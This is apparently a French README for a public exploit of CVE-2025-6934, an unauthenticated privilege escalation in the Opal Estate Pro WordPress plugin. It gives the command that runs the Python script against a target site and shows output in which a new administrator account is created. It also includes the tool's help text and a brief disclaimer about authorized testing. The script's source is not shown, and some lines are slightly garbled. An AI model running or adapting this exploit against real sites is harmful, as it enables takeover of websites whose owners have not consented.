
Opal Estate Pro <= 1.7.5 - Élévation de privilèges non authentifiée
Le plugin Opal Estate Pro – Property Management and Submission pour WordPress, utilisé par le thème FullHouse - Real Estate Responsive WordPress Theme, est vulnérable à une élévation de privilèges dans toutes les versions jusqu'à 1.7.5 incluse.
Cet exploit Python automatise le processus d'élévation de privilèges en :
readme.txt.python CVE-2025-6934.py -u http://target-site.com/login-default/ -mail [email protected] -password nxp1234
[•] Vérification de la version du plugin :
[+] Version vulnérable détectée : 1.7.5
[•] Tentative d'exploitation démarrée
[+] Nonce trouvé : 70dd70630b
[+] Code HTTP : 200
[✔] Exploitation réussie !
--------------------------
Nom d'utilisateur : nxploitedadmin
Email : [email protected]
Mot de passe : nxp1234
Rôle : administrateur
--------------------------
Exploit par : Khaled_alenazi (Nxploited) | https://github.com/Nxploited
usage: CVE-2025-6934.py [-h] -u URL -mail NEWMAIL -password NEWPASSWORD
CVE-2025-6934 Exploit par Khaled Alenazi (Nxploited)
options:
-h, --help affiche ce message d'aide et quitte
-u, --url URL URL cible (ex. http://site.com/path/)
-mail, --newmail NEWMAIL
Email à enregistrer comme administrateur
-password, --newpassword NEWPASSWORD
Mot de passe pour le nouvel utilisateur administrateur
Ce script est destiné uniquement à des fins éducatives et de tests de sécurité autorisés.
Toute utilisation non autorisée de cet outil contre des cibles sans consentement est strictement interdite.
Par : Khaled_alenazi (Nxploited)